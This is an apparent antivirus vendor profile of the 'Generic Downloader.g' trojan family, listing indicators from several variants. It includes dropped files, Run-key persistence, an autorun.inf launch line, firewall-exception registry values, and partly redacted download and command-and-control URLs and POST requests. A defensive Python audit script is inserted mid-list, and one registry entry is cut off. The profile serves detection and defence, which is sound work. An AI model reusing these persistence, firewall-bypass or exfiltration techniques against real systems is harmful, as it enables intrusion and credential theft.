Virus Profile: Generic Downloader.g

Virus Profile information details
Risk Assessment: Home Low | Corporate Low
Date Discovered: 3/31/2005
Date Added: 10/6/2004
Origin: N/A
Length: Varies
Type: Trojan
Subtype: Win32
DAT Required: 7273

Description

This is a trojan detection. Unlike viruses, trojans do not self-replicate. They are spread manually, often under the premise that they are beneficial or wanted. The most common installation methods involve system or security exploitation, and unsuspecting users manually executing unknown programs. Distribution channels include email, malicious or hacked web pages, Internet Relay Chat (IRC), peer-to-peer networks, etc.

Aliases

  • Nod32 - Win32/Spy.Zbot.AAO trojan
  • Symantec - Trojan.Gen
  • Microsoft - PWS:Win32/Zbot
  • Norman - W32/ZBot.BJKJ (trojan)
  • Avira - TR/Spy.ZBot.EB.107

Indication of Infection

    • Presence of the above-mentioned files and registry keys.
    • Presence of the above-mentioned activities.
    • It connects to the following sites and downloads malicious files:
      • [removed]eaarc.com/down/update10h.rar
      • [removed]eaard.com/down/hou.rar
      • [removed]eaarb.com/down/hou.rar

Methods of Infection

Trojans do not self-replicate. They are spread manually, often under the premise that the executable is something beneficial. Distribution channels include IRC, peer-to-peer networks, newsgroup postings, etc.

Virus Characteristics

------------------------Updated on April 17th 2014-------------------------------

Aliases –

  • Kaspersky - Trojan.Win32.Agent.icbs
  • Fortinet - W32/Dloader.G!tr
  • Sunbelt - Trojan.Win32.Generic!BT


Characteristics:

"Generic Downloader.g" is a detection for a Trojan that downloads other malicious files.

Upon execution, the Trojan connects to the following IP address:

  • 37.[removed].127

Upon execution, the following files are added to the system:

  • %temp%\ABF54AE500247FF4B4909FF295A1AC9C44F08D65
  • %temp%\nse9.tmp\file1.exe
  • %temp%\nse9.tmp\file2.exe
  • %WINDIR%\System32\dfrg\mst.exe
  • %WINDIR%\System32\dfrg\stub.exe
  • %WINDIR%\System32\dfrg\reg_util.exe
  • %WINDIR%\System32\dfrg\svc.exe
  • %temp%\nsc11.tmp\Processes.dll
  • %temp%\nsmE.tmp
  • %temp%\nsc11.tmp
  • %temp%\nsd8.tmp
  • %temp%\nse9.tmp
  • %temp%\nsw1E.tmp
  • %temp%\nsh1F.tmp
  • %temp%\pack.tmp
  • %temp%\nsc11.tmp\utils_plugin.dll
  • %temp%\nsh1F.tmp\System.dll
  • %temp%\nsh1F.tmp\SimpleSC.dll
  • %appdata%\Updater\updater.dll
  • %temp%\nsc11.tmp\NSISdl.dll


------------------------Updated on Feb 20th 2014-------------------------------

Aliases –

  • ESET-NOD32 - Win32/Delf.OGJ
  • Kaspersky - Trojan.Win32.Boht.acl
  • Microsoft - TrojanDownloader:Win32/Umbald.A


"Generic Downloader.g" is a detection for a worm that may propagate via removable drives or network shares. It is also designed to download other malicious files.

Upon execution, the worm creates the following file in the following location:

  • [Removable drive]:\starter.exe

It also drops an autorun.inf file into the root of all removable drives and mapped drives in an attempt to run an executable automatically when the drive is accessed.

The AutoRun.inf file points to the malware executable; when the removable or networked drive is accessed from a machine that supports the Autorun feature, the malware is launched automatically.

The autorun.inf is configured to launch the worm file via the following command syntax:

[AUTORUN]
open=starter.exe

Upon execution, the Trojan connects to the following URLs:

  • hxxp://199.7.[Removed].190/pca3.crl
  • hxxp://199.7.[Removed].190/CSC3-2009-2.crl
  • to[Removed]g.ru

The following registry key has been added to the system:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\#xP#J4DG

The following registry key value has been added to the system:

  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchost.exe: "" %userprofile%\Desktop\1360675196.exe""

The above registry entry ensures that the worm is executed on every system boot.

The worm creates a mutex with the following name:

  • #xP#J4DG

------------------------Updated on December 12th 2013--------------------

Aliases

  • Microsoft - TrojanDownloader:Win32/Upatre.J
  • Kaspersky - Trojan.Win32.Agent.ibgu
  • Symantec - Trojan.Zbot

"Generic Downloader.g" is a detection for a Trojan that downloads malicious files from a remote server and executes them on the user's system. It also steals sensitive information from the compromised machine and sends it to the remote attacker. It spreads via spam email as an attachment. The Trojan may delete itself after execution.

"Generic Downloader.g" steals stored passwords, cache and cookies from the following applications:

  • E-mail client
  • Browser
  • FTP client

Upon execution, the Trojan drops files into the following locations:

  • %AppData%\Microsoft\Address Book\username.wab
  • %AppData%\Eceg\ryraaf.exe [Detected as pwszbot-fln!30b785b93eea]
  • %temp%\supdater.exe [Detected as downloader-fxr!9ebc342110dc]
  • %UserProfile%\Local Settings\Temporary Internet Files\Content.IE5\FJ6SRVGY\pdf[1].exe [Detected as pwszbot-fln!e77e5c42c51a]

The following folders are created by the Trojan:

  • %AppData%\Microsoft\Address Book
  • %AppData%\Eceg


Upon execution, the Trojan injects code into explorer.exe and attempts to connect to a long list of remote IP addresses and hostnames (partially redacted in the original profile).


The following registry keys are added to the system:

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Uthouwn
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\Wab File Name
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List

The following registry key values have been added to the system:

  • HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications: 0x00000000

The above registry value ensures that the Trojan disables the firewall's "disable notification message" setting.

  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7303:UDP: "7303:UDP:*:Enabled:UDP 7303"
  • HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List\7070:TCP: "7070:TCP:*:Enabled:TCP 7070"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Windows\CurrentVersion\Run\Upmiw: ""%AppData%\Eceg\ryraaf.exe""

The above registry entry ensures that the malware is executed on every system startup.

  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\
      • LDAP Server ID: 0x00000003
      • Account Name: "WhoWhere Internet Directory Service"
      • LDAP Server: "ldap.whowhere.com"
      • LDAP URL: "http://www.whowhere.com"
      • LDAP Search Return: 0x00000064
      • LDAP Timeout: 0x0000003C
      • LDAP Authentication: 0x00000000
      • LDAP Simple Search: 0x00000001
      • LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\
      • LDAP Server ID: 0x00000002
      • Account Name: "VeriSign Internet Directory Service"
      • LDAP Server: "directory.verisign.com"
      • LDAP URL: "http://www.verisign.com"
      • LDAP Search Return: 0x00000064
      • LDAP Timeout: 0x0000003C
      • LDAP Authentication: 0x00000000
      • LDAP Search Base: "NULL"
      • LDAP Simple Search: 0x00000001
      • LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\
      • LDAP Server ID: 0x00000001
      • Account Name: "Bigfoot Internet Directory Service"
      • LDAP Server: "ldap.bigfoot.com"
      • LDAP URL: "http://www.bigfoot.com"
      • LDAP Search Return: 0x00000064
      • LDAP Timeout: 0x0000003C
      • LDAP Authentication: 0x00000000
      • LDAP Simple Search: 0x00000001
      • LDAP Logo: "%ProgramFiles%\Common Files\Services\bigfoot.bmp"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Active Directory GC\
      • LDAP Server ID: 0x00000000
      • Account Name: "Active Directory"
      • LDAP Server: "NULL"
      • LDAP Search Return: 0x00000064
      • LDAP Timeout: 0x0000003C
      • LDAP Authentication: 0x00000002
      • LDAP Simple Search: 0x00000000
      • LDAP Bind DN: 0x00000000
      • LDAP Port: 0x00000CC4
      • LDAP Resolve Flag: 0x00000001
      • LDAP Secure Connection: 0x00000000
      • LDAP User Name: "NULL"
      • LDAP Search Base: "NULL"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\Accounts\
      • PreConfigVer: 0x00000004
      • PreConfigVerNTDS: 0x00000001
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Internet Account Manager\
      • Server ID: 0x00000004
      • Default LDAP Account: "Active Directory GC"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Viesasfa\36hed888: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Viesasfa\325b6a52: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Viesasfa\13b0622a: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Viesasfa\2dei0g7f: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Viesasfa\1fc2ab5f: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\Viesasfa\jf50cj0: [Binary Data]
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4\Wab File Name\: "%AppData%\Microsoft\Address Book\username.wab"
  • HKEY_USERS\S-1-5-21[Varies]\Software\Microsoft\WAB\WAB4
      • OlkContactRefresh: 0x00000000
      • OlkFolderRefresh: 0x00000000

------------------------------------------------------------------------------------------

-------- Updated on December 4th 2012---------

Aliases

  • Symantec - Backdoor.Wakeminap
  • Norman - W32/Agent.AKWQN (trojan)
  • Kaspersky - Trojan-Downloader.Win32.Agent.wlzn
  • Fortinet - W32/Agent.WLZN!tr.dldr

"Generic Downloader.g" is a detection for a Trojan that downloads other payloads.

Upon execution, the Trojan drops files in the following locations:

  • %Temp%\POWER_GEN_2012.pdf
  • %Temp%\em.exe

Upon execution, it tries to connect to the following URLs over HTTP:

  • http://63.73.[Removed].7/scripts/images/device_input.asp?device_t=2349438461&key=vrnnprjd&device_id=em&cv=vrnnprjdecejxvlub (application/x-www-form-urlencoded)
  • http://63.73.[Removed].7/scripts/images/record.asp?device_t=8533569937&key=rgsawyrs&device_id=em&cv=rgsawyrsdowrskfgx&result=%0D%0ATime%3A%09Tue%20Dec%2004%2015%3A32%3A19%202012%0AAgent%3A%09Mozilla%2F4.0%20(compatible%3B%20MSIE%207.0%3B%20Win32%3B%20Microsoft%20Windows%20XP%20Professional%20Service%20Pack%203%20(build%202600))%0D%0Aurl%20OK%21%0D%0Apickup%20command%20Ok%21%0D%0AMon%20Nov%2026%2008%3A29%3A26%202012%3B%20%09sleep%2024%0D%0Asleep%2024%09wakeup%3DWed%20Dec%2005%2015%3A32%3A22%202012%0A%0D%0ANext%3AWed%20Dec%2005%2015%3A32%3A22%202012%0Adelay%3A3600%20sec%0D%0A%0D%0A
  • http://63.73.[Removed].7/scripts/images/device_em.asp?device_t=4827883592&key=ijukawom&device_id=em&cv=ijukawomoqypvvfzl
  • www.helios[Removed]ners.com
  • 7.11.[Removed].63


-------- Updated on September 17, 2012--------

"Generic Downloader.g" is a detection for a Trojan that receives commands from an attacker to access the infected machine and to download other malicious files. The Trojan creates a firewall rule in order to bypass the firewall, which may allow the remote attacker to issue commands and control the compromised machine without the user's knowledge. It may also steal personal and confidential information from the compromised computer, including:

  • Outlook Express passwords
  • Digital certificates
  • Internet Explorer cookies
  • Cached passwords

Upon execution, the Trojan injects itself into explorer.exe and drops files in the following locations:

  • %AppData%\Microsoft\Address Book\Administrator.wab
  • %AppData%\Microsoft\Address Book\Administrator.wab~
  • %AppData%\Aqozba\toynt.exe
  • %AppData%\Dozyz\heact.adb
  • %AppData%\Nozi\uwebi.tmp

Upon execution, it tries to connect to the following URLs over HTTP:

  • sg.[Removed].real.com
  • sp[Removed]d.su
  • c[Removed]to.su
  • r[Removed]ks.su
  • e[Removed]alt.pl
  • r[Removed]rain.pl

Captured POST request:

  • POST /sopelka3/file.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Host: c[Removed]to.su
    Content-Length: 131
    Connection: Keep-Alive
    Cache-Control: no-cache
  • POST /dedun23/file.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Host: e[Removed]alt.pl
    Content-Length: 128
    Connection: Keep-Alive
    Cache-Control: no-cache
  • POST /dedun23/gate.php HTTP/1.1
    Accept: */*
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
    Host: re[Removed]ain.pl
    Content-Length: 341
    Connection: Keep-Alive
    Cache-Control: no-cache

The following registry keys have been added to the system:

  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Explorer\Privacy
  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Account Manager
  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere
  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Liotfu
  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\WAB

The following registry values have been added to the system:

  • HKLM\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\WINDOWS\explorer.exe: "C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer"
  • HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\C:\WINDOWS\explorer.exe: "C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer"

The above registry values show that the Trojan creates a firewall rule to bypass the firewall, which may allow the remote attacker to issue commands and control the compromised machine without the user's knowledge.
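Added here as a defender's example (it is not McAfee's code): a small Python audit that parses the two Windows Firewall policy value formats quoted in this profile, the GloballyOpenPorts entries from the December 2013 update and the AuthorizedApplications entry above, and flags the pattern both updates describe. The sample values are constructed from the profile's own entries; the msmsgs.exe baseline entry is an assumed benign exception, and reading the values from a live registry is left to the caller.

```python
# Added example for this profile (not McAfee's code): parse Windows XP-era
# firewall policy registry values and flag the ones matching the behaviour
# described in the December 2013 and September 2012 updates.  The sample
# data is constructed from the profile's entries plus one assumed benign one.
from dataclasses import dataclass
from typing import List, Sequence, Tuple


@dataclass
class FirewallEntry:
    subkey: str       # "GloballyOpenPorts" or "AuthorizedApplications"
    value_name: str   # registry value name: "7303:UDP" or an executable path
    target: str       # the same thing, as carried inside the value data
    scope: str        # "*" = any remote address, otherwise an address/subnet list
    enabled: bool
    display: str      # name shown in the Windows Firewall UI


def parse_value(subkey: str, value_name: str, data: str) -> FirewallEntry:
    # Both formats end in ':scope:state:name', and the target itself holds a
    # colon (drive letter or port:proto), so the data is split from the right.
    target, scope, state, display = data.rsplit(":", 3)
    return FirewallEntry(subkey, value_name, target, scope,
                         state.lower() == "enabled", display)


def audit(entries: Sequence[FirewallEntry],
          baseline_apps: Sequence[str] = ()) -> List[str]:
    """Return one finding per enabled entry that matches this profile's pattern."""
    baseline = {p.lower() for p in baseline_apps}
    findings: List[str] = []
    for e in entries:
        if not e.enabled:
            continue
        if e.value_name.lower() != e.target.lower():
            findings.append(f"{e.subkey}: value name {e.value_name!r} "
                            f"does not match data target {e.target!r}")
        if e.subkey == "GloballyOpenPorts" and e.scope == "*":
            findings.append(f"GloballyOpenPorts: {e.target} opened to any "
                            f"remote host ({e.display!r})")
        elif e.subkey == "AuthorizedApplications":
            exe = e.target.rsplit("\\", 1)[-1].lower()
            if exe == "explorer.exe":
                # The shell has no reason to accept inbound connections; the
                # profile describes code injected into explorer.exe.
                findings.append(f"AuthorizedApplications: shell process "
                                f"{e.target} allowed inbound")
            elif e.target.lower() not in baseline:
                findings.append(f"AuthorizedApplications: {e.target} is not "
                                f"in the baseline ({e.display!r})")
    return findings


# Constructed sample: the three entries quoted in the profile plus one assumed
# benign exception (msmsgs.exe) that a known-good baseline would contain.
SAMPLE_VALUES: List[Tuple[str, str, str]] = [
    ("GloballyOpenPorts", "7303:UDP", "7303:UDP:*:Enabled:UDP 7303"),
    ("GloballyOpenPorts", "7070:TCP", "7070:TCP:*:Enabled:TCP 7070"),
    ("AuthorizedApplications", r"C:\WINDOWS\explorer.exe",
     r"C:\WINDOWS\explorer.exe:*:Enabled:Windows Explorer"),
    ("AuthorizedApplications", r"C:\Program Files\Messenger\msmsgs.exe",
     r"C:\Program Files\Messenger\msmsgs.exe:*:Enabled:Windows Messenger"),
]
BASELINE_APPS = (r"C:\Program Files\Messenger\msmsgs.exe",)


def audit_sample() -> List[str]:
    """Parse and audit the constructed sample; yields three findings."""
    return audit([parse_value(*v) for v in SAMPLE_VALUES], BASELINE_APPS)


if __name__ == "__main__":
    for finding in audit_sample():
        print(finding)
```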

  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Windows\CurrentVersion\Run\Vubavetie: ""%AppData%\Aqozba\toynt.exe""

The above registry entry ensures that the Trojan registers itself on the compromised system and executes on every boot.

  • HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Explorer\Privacy\CleanCookies: 0x00000000

The above registry value ensures that the Trojan prevents the removal of expired Internet Explorer browser cookies.

The below registry key value confirms that the Trojan configures the LDAP server in order to steal confidential information.

HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Account Manager\Accounts\WhoWhere\

  • LDAP Server ID: 0x00000003
  • Account Name: "WhoWhere Internet Directory Service"
  • LDAP Server: "ldap.whowhere.com"
  • LDAP URL: http://www.whowhere.com
  • LDAP Search Return: 0x00000064
  • LDAP Timeout: 0x0000003C
  • LDAP Authentication: 0x00000000
  • LDAP Simple Search: 0x00000001
  • LDAP Logo: "%ProgramFiles%\Common Files\Services\whowhere.bmp"

HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Account Manager\Accounts\VeriSign\

  • LDAP Server ID: 0x00000002
  • Account Name: "VeriSign Internet Directory Service"
  • LDAP Server: "directory.verisign.com"
  • LDAP URL: http://www.verisign.com
  • LDAP Search Return: 0x00000064
  • LDAP Timeout: 0x0000003C
  • LDAP Authentication: 0x00000000
  • LDAP Search Base: "NULL"
  • LDAP Simple Search: 0x00000001
  • LDAP Logo: "%ProgramFiles%\Common Files\Services\verisign.bmp"

HKEY_USERS\S-1-5[Varies]\Software\Microsoft\Internet Account Manager\Accounts\Bigfoot\

All Users:
Use current engine and DAT files for detection and removal.

Modifications made to the system registry and/or INI files for the purpose of hooking system startup will be successfully removed if cleaning with the recommended engine and DAT combination (or higher).